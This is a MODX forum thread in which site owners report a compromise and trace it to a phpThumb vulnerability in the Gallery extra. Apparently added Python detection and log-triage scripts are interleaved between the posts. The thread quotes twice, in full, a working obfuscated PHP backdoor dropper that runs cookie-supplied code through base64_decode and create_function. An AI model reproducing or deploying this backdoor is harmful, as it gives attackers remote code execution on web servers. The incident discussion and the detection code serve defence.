    • 41101
    • 40 Posts
    Hello,

    I'm running Revo 2.2.7 with the security patch installed.

    Today I noticed in my assets folder there was a directory with the name '.' inside. Within the '.' folder there was a file called l.php which had the following content:

    <?php $knyl="chJGM9J2chNvdW50JzskYT0kX0NPT0tJRchTchtpchZichhyZXchNldCgkYSk9PSdzaScgJiYgJGMoJGEchpPjMpechyRr";$zzfo="PSdzYWochzcHduZCc7ZWNobyAnPCcuJGsuchJchz4nO2V2chYWwoYmFzZTY0X2RlY29kZShwcchmVnX3Jlcc";$lzcn="pvaW4oYXJychYXlfchc2xpYch2chUoJGEsJchGMoJGEpLTMpKSkpKTtlY2hvchICchc8LchycuJGsuJchz4nchO3ch0=";$rbyz = str_replace("u","","ustur_uruepuluauce");$ngnd="hGchxhY2UochYXJychYXkoJy9bXlchx3PVxzXSch8chnchLCcvXHMvchJyksIGFychcmF5KCcnLCcrJyksIchG";$sczz = $rbyz("v", "", "vbavsev64_vdevcvovdve");$qewo = $rbyz("j","","jcrjejajtej_jfjujncjtijojn");$tlbl = $qewo('', $sczz($rbyz("ch", "", $knyl.$zzfo.$ngnd.$lzcn))); $tlbl(); ?>


    This obviously appears to have been injected somehow.

    I've removed the offending folder and file but am trying to understand how it has been done.

    Anyone had anything similar? Is it a permissions issue?

    Thanks
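A defender-side sweep for the two artifacts this post describes (an entry that shows up as '.' in a listing, and a PHP file that rebuilds function names with str_replace() and then calls them through a variable). This is an added example, not code from the thread or from MODX; the indicator regexes, the `min_hits` threshold and the sample tree are constructed here for illustration.

```python
"""Hunt for the two artifacts described in the opening post: a directory whose
name shows up as '.' in a listing, and a PHP file that rebuilds function names
with str_replace() and then calls them through a variable.  Added example; the
heuristics and the sample tree are constructed for illustration."""
import os
import re
import tempfile
from pathlib import Path

# Indicators modelled on the l.php dropper quoted in the thread.  Each one alone
# is weak (str_replace and base64_decode have legitimate uses), so a file is
# reported only when several co-occur.
INDICATORS = {
    # str_replace("u", "", "ustur_uruepuluauce") style name assembly
    "str_replace_name_builder": re.compile(
        r'str_replace\s*\(\s*["\'][^"\']{1,3}["\']\s*,\s*["\']["\']\s*,\s*["\'][^"\']+["\']\s*\)'),
    # $tlbl(); -- calling a function whose name lives in a variable
    "variable_function_call": re.compile(r'\$[A-Za-z_]\w*\s*\(\s*\)\s*;'),
    "dynamic_code_primitive": re.compile(r'\b(base64_decode|eval|create_function|assert)\s*\('),
    "cookie_driven_input": re.compile(r'\$_COOKIE\b'),
    # 60+ chars of base64 alphabet in one literal: an encoded payload
    "long_opaque_string": re.compile(r'["\'][A-Za-z0-9+/=]{60,}["\']'),
}
PHP_SUFFIXES = (".php", ".phtml", ".php5", ".inc")


def suspicious_dir_name(name: str) -> bool:
    """True for names made only of dots and whitespace.  POSIX cannot hold an
    entry literally named '.', so droppers use look-alikes such as '. ' that
    render as '.' in many listings (assumption about what the poster saw)."""
    core = name.strip()
    return core != "" and set(core) == {"."}


def scan_php_source(source: str) -> list:
    """Return the names of all indicators present in one PHP source text."""
    return [label for label, rx in INDICATORS.items() if rx.search(source)]


def scan_webroot(root: str, min_hits: int = 2) -> dict:
    """Walk a web root; report odd directory names and PHP files with >= min_hits."""
    findings = {"suspicious_dirs": [], "suspicious_files": {}}
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if suspicious_dir_name(d):
                findings["suspicious_dirs"].append(os.path.join(dirpath, d))
        for f in filenames:
            if not f.lower().endswith(PHP_SUFFIXES):
                continue
            path = os.path.join(dirpath, f)
            try:
                hits = scan_php_source(Path(path).read_text(errors="replace"))
            except OSError:
                continue  # unreadable file: skip it, do not abort the sweep
            if len(hits) >= min_hits:
                findings["suspicious_files"][path] = hits
    return findings


# Constructed sample: the same name-rebuilding tokens as the quoted dropper, but
# with an inert filler blob where the payload would be, so the file does nothing
# useful even if executed.
DROPPER_SAMPLE = (
    '<?php $p = "' + "A" * 64 + '";'
    '$rbyz = str_replace("u", "", "ustur_uruepuluauce");'
    '$sczz = $rbyz("v", "", "vbavsev64_vdevcvovdve");'
    '$qewo = $rbyz("j", "", "jcrjejajtej_jfjujncjtijojn");'
    '$tlbl = $qewo("", $sczz($p)); $tlbl(); ?>'
)
# Constructed benign file: legitimate str_replace use must not be flagged.
BENIGN_SAMPLE = (
    '<?php $title = str_replace("_", " ", $slug); '
    'echo htmlspecialchars($title); ?>'
)


def build_sample_tree() -> str:
    """Create assets/'. '/l.php (dropper) and assets/components/gallery/index.php
    (benign) under a temp dir and return the root path."""
    root = tempfile.mkdtemp(prefix="webroot_")
    hidden = os.path.join(root, "assets", ". ")
    gallery = os.path.join(root, "assets", "components", "gallery")
    os.makedirs(hidden)
    os.makedirs(gallery)
    Path(hidden, "l.php").write_text(DROPPER_SAMPLE)
    Path(gallery, "index.php").write_text(BENIGN_SAMPLE)
    return root


if __name__ == "__main__":
    report = scan_webroot(build_sample_tree())
    for d in report["suspicious_dirs"]:
        print("odd directory name:", repr(d))
    for path, hits in report["suspicious_files"].items():
        print("suspicious PHP file:", path, "->", ", ".join(hits))
```

Note that the dropper sample never contains the literal words `base64_decode` or `create_function`, which is exactly why a grep for those names misses it; the name-builder and variable-call patterns together are what catch it. Point `scan_webroot()` at the real document root to sweep a live site.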


      • 3749
      • 24,544 Posts
      The odds are that someone has either gained access to the server or guessed your password. It's possible, but very unlikely, that this is related to MODX security. If you've created any front-end forms that interact with the database or file system, that could also be a point of entry.

      The bad news is that the code you've found may have created one or more back doors to your site that removing it won't fix.

      The usual recommendation in situations like this is to change all your usernames and passwords (MODX, cPanel, DB, etc.), then wipe the site and restore from a backup made before the hack, then change all the usernames and passwords again.
        Did I help you? Buy me a beer
        Get my Book: MODX:The Official Guide
        MODX info for everyone: http://bobsguides.com/modx.html
        My MODX Extras
        Bob's Guides is now hosted at A2 MODX Hosting
        And none of that will be of any use if your own computer has been taken over. You should check it with a good antivirus, and a firewall that reports any outgoing connections.
          Studying MODX in the desert - http://sottwell.com
          Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
          Join the Slack Community - http://modx.org
          • 41101
          • 40 Posts
          Thanks for the replies.

          It's definitely not a virus on my Mac. I'll change the site usernames/passwords and do a clean install.

          Could it be done if the permission on my assets folder was inadvertently set to something like 777?

          I'll have a look through my log files and see if that gives any clues.

          Thanks
            • 44234
            • 219 Posts
            Quote from: jonboy at Dec 10, 2013, 03:19 PM
            Hello,

            I'm running Revo 2.2.7 with the security patch installed.

            Today I noticed in my assets folder there was a directory with the name '.' inside. Within the '.' folder there was a file called l.php which had the following content:

            <?php $knyl="chJGM9J2chNvdW50JzskYT0kX0NPT0tJRchTchtpchZichhyZXchNldCgkYSk9PSdzaScgJiYgJGMoJGEchpPjMpechyRr";$zzfo="PSdzYWochzcHduZCc7ZWNobyAnPCcuJGsuchJchz4nO2V2chYWwoYmFzZTY0X2RlY29kZShwcchmVnX3Jlcc";$lzcn="pvaW4oYXJychYXlfchc2xpYch2chUoJGEsJchGMoJGEpLTMpKSkpKTtlY2hvchICchc8LchycuJGsuJchz4nchO3ch0=";$rbyz = str_replace("u","","ustur_uruepuluauce");$ngnd="hGchxhY2UochYXJychYXkoJy9bXlchx3PVxzXSch8chnchLCcvXHMvchJyksIGFychcmF5KCcnLCcrJyksIchG";$sczz = $rbyz("v", "", "vbavsev64_vdevcvovdve");$qewo = $rbyz("j","","jcrjejajtej_jfjujncjtijojn");$tlbl = $qewo('', $sczz($rbyz("ch", "", $knyl.$zzfo.$ngnd.$lzcn))); $tlbl(); ?>


            This obviously appears to have been injected somehow.

            I've removed the offending folder and file but am trying to understand how it has been done.

            Anyone had anything similar? Is it a permissions issue?

            Thanks

            Ok I have found the exact same file on one of our Dev servers. Also found identical file here: /home/foo/public_html/assets/components/gallery/l.php.

            Running Revo 2.2.10-Advanced.

            I have also found an error_log file in the asset folder containing:
            [10-Dec-2013 15:18:35 Europe/London] PHP Warning:  chdir() [<a href='function.chdir'>function.chdir</a>]: No such file or directory (errno 2) in /home/foo/public_html/assets/components/gallery/l.php(1) : runtime-created function(1) : eval()'d code on line 1


            The modx error log had entries that reference gallery, phpThumb and imageMagick. These included urls to what looks like a compromised Italian WordPress website.

            jonboy, did you have Gallery or Wordpress installed on your server?
              Find me on Twitter, GitHub or Google+
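The error_log entry in the post above is worth more than it looks: PHP names the origin of a warning as `l.php(1) : runtime-created function(1) : eval()'d code`, which means the failing code was built at run time by create_function()/eval() rather than loaded from a file on disk. The triage below is an added example, not code from the thread or MODX; its first sample line is the warning quoted above, the other sample lines are constructed.

```python
"""Triage a PHP error_log for entries raised from code created at run time
(create_function() or eval()), the pattern the quoted chdir() warning shows.
Added example, not code from the thread; the first sample line is the one
quoted in the thread, the others are constructed."""
import re
from typing import Optional

# PHP error_log layout: [timestamp] PHP Level:  message in <where> on line N
LOG_LINE = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\s+PHP\s+(?P<level>[A-Za-z ]+?):\s+"
    r"(?P<msg>.*?)\s+in\s+(?P<where>.+?)\s+on line\s+(?P<line>\d+)\s*$"
)
# When the failing code came from create_function()/eval(), PHP appends these
# pseudo-frames to the file name instead of giving a plain path.
DYNAMIC_CODE = re.compile(r"runtime-created function|eval\(\)'d code")
HTML_TAG = re.compile(r"<[^>]+>")  # html_errors=On wraps function names in <a> tags


def parse_php_error_line(line: str) -> Optional[dict]:
    """Return a structured record for one error_log line, or None if it is not one."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    where = m.group("where")
    return {
        "timestamp": m.group("ts"),
        "level": m.group("level"),
        "message": HTML_TAG.sub("", m.group("msg")),
        # the real file is everything before the first "(line)" frame marker
        "origin_file": where.split("(", 1)[0],
        "dynamic_code": bool(DYNAMIC_CODE.search(where)),
        "line": int(m.group("line")),
    }


def triage_error_log(lines) -> list:
    """Keep only entries raised from run-time-created code; on a site that ships
    no such code this is a strong sign of an injected dropper."""
    out = []
    for line in lines:
        rec = parse_php_error_line(line)
        if rec and rec["dynamic_code"]:
            out.append(rec)
    return out


SAMPLE_LOG = [
    # the warning quoted in the thread
    "[10-Dec-2013 15:18:35 Europe/London] PHP Warning:  chdir() "
    "[<a href='function.chdir'>function.chdir</a>]: No such file or directory (errno 2) "
    "in /home/foo/public_html/assets/components/gallery/l.php(1) : "
    "runtime-created function(1) : eval()'d code on line 1",
    # constructed: an ordinary notice from real on-disk code
    "[10-Dec-2013 15:20:01 Europe/London] PHP Notice:  Undefined index: tpl "
    "in /home/foo/public_html/core/components/gallery/model/gallery.class.php on line 42",
    # constructed: not a PHP error line at all
    "GET /assets/components/gallery/l.php 200",
]

if __name__ == "__main__":
    for rec in triage_error_log(SAMPLE_LOG):
        print(f'{rec["timestamp"]}  {rec["origin_file"]}  <- {rec["message"]}')
```

Feed it the `error_log` files found under the web root (the thread found one in the assets folder); the `origin_file` of each hit is the file to preserve for analysis before cleaning up, and its timestamp narrows the window to search in the web server access log.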
              • 44234
              • 219 Posts
              After investigating this, I can confirm there is a vulnerability with phpThumb. An attacker can use the Gallery Extra to create a malicious file on your server or download one from a separate server.

              I think all versions of MODX Revo are affected, I have confirmed this hack with MODX 2.2.10 Advanced. I have emailed the Core team so they are aware of this.

              To fix this you must upgrade your phpThumb script from v1.7.9 to v1.7.11.

              I will not post the hack on the forum but please pm me if you wish to test your site.

                Find me on Twitter, GitHub or Google+
                • 41101
                • 40 Posts
                Yes I do indeed use the Gallery addon.

                Thanks to both of you for posting your findings here.
                  • 44234
                  • 219 Posts
                  No problem.

                  Quote from: jonboy at Dec 23, 2013, 01:48 PM
                  Yes I do indeed use the Gallery addon.

                  If you haven't already then you must manually update the core phpThumb script now, or uninstall Gallery. I guarantee that is how they got in, and even if you have clean restored your server/site the vulnerability is still there.
                    Find me on Twitter, GitHub or Google+
                  • FYI, the phpthumb files in MODX core have been updated to those from version 1.7.11 (with a couple of additional obvious bug fixes) for MODX 2.2.11 (to be released shortly) at https://github.com/modxcms/revolution/commit/09e9db207fe83ec4d7fc9794527fd8b2e9aaa17d and for 2.3.x in the develop branch at https://github.com/modxcms/revolution/commit/d2d7e9d5ca636d325e54e5259350b3d7c9f2807e
                      • 44661
                      • 31 Posts
                      Quote from: davidpede at Dec 23, 2013, 05:56 PM

                      To fix this you must upgrade your phpThumb script from v1.7.9 to v1.7.11.
                      Hello,
                      Just checked the phpThumb files in my core Modx installation (core/model/phpthumb) as I am also using the Gallery extra and imageMagick, but haven't seen any version number on those files? How can you tell the phpThumb version?
                      On GitHub it's written that JamesHeinrich phpThumb v1.7.11 was released on Aug 08, 2011, so I would assume recent Modx Revo versions (say 2.2.8 to 2.2.10) should use this latest phpThumb version?? But of course I need to ascertain this!
                      Thanks
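One way to answer the version question and confirm the 1.7.11 upgrade named earlier in the thread, as an added example (not MODX or phpThumb code): upstream phpThumb declares its version in phpthumb.class.php as a `$phpthumb_version = '...'` property, and the check below greps for that declaration. The property layout is an assumption about upstream phpThumb, and the two sample class files written to a temp dir are constructed stand-ins for core/model/phpthumb/phpthumb.class.php.

```python
"""Read the version string phpThumb declares in phpthumb.class.php and compare it
with the 1.7.11 fix level named in the thread.  Added example, not MODX or
phpThumb code.  Assumes the class file carries a `$phpthumb_version = '...'`
property as upstream phpThumb does; the sample file contents are constructed."""
import re
import tempfile
from pathlib import Path

FIXED_VERSION = (1, 7, 11)  # the upgrade target given in the thread
# Accepts '1.7.11' with or without a trailing build stamp such as '-201108081537'.
VERSION_DECL = re.compile(
    r"\$phpthumb_version\s*=\s*['\"](?P<ver>\d+(?:\.\d+)+)(?:-[0-9A-Za-z]+)?['\"]\s*;"
)


def parse_version(text: str) -> tuple:
    """Pull (major, minor, patch) out of a phpthumb.class.php source text."""
    m = VERSION_DECL.search(text)
    if not m:
        raise ValueError("no $phpthumb_version declaration found")
    return tuple(int(part) for part in m.group("ver").split("."))


def check_phpthumb(class_file: str) -> dict:
    """Report the installed version and whether it reaches the fixed release."""
    found = parse_version(Path(class_file).read_text(errors="replace"))
    return {
        "file": class_file,
        "version": ".".join(map(str, found)),
        "patched": found >= FIXED_VERSION,  # tuple comparison: (1,7,9) < (1,7,11)
    }


# Constructed stand-ins for core/model/phpthumb/phpthumb.class.php, one at the
# pre-fix level and one at the fixed level; the build stamps are illustrative.
OLD_CLASS = "<?php\nclass phpthumb {\n\tvar $phpthumb_version = '1.7.9-200805132119';\n}\n"
NEW_CLASS = "<?php\nclass phpthumb {\n\tvar $phpthumb_version = '1.7.11-201108081537';\n}\n"


def demo() -> list:
    """Write both samples to a temp dir and check each one."""
    d = tempfile.mkdtemp(prefix="phpthumb_")
    results = []
    for name, body in (("old/phpthumb.class.php", OLD_CLASS),
                       ("new/phpthumb.class.php", NEW_CLASS)):
        p = Path(d, name)
        p.parent.mkdir(parents=True)
        p.write_text(body)
        results.append(check_phpthumb(str(p)))
    return results


if __name__ == "__main__":
    for r in demo():
        status = "OK (>= 1.7.11)" if r["patched"] else "VULNERABLE - upgrade phpThumb"
        print(f'{r["file"]}: phpThumb {r["version"]} -> {status}')
```

Run `check_phpthumb()` against the real core/model/phpthumb/phpthumb.class.php; a version string at or above 1.7.11 is the quick answer, while diffing the whole directory against the upstream 1.7.11 release (or the MODX commits linked above) is the thorough one, since a partially patched copy can still carry the old version string.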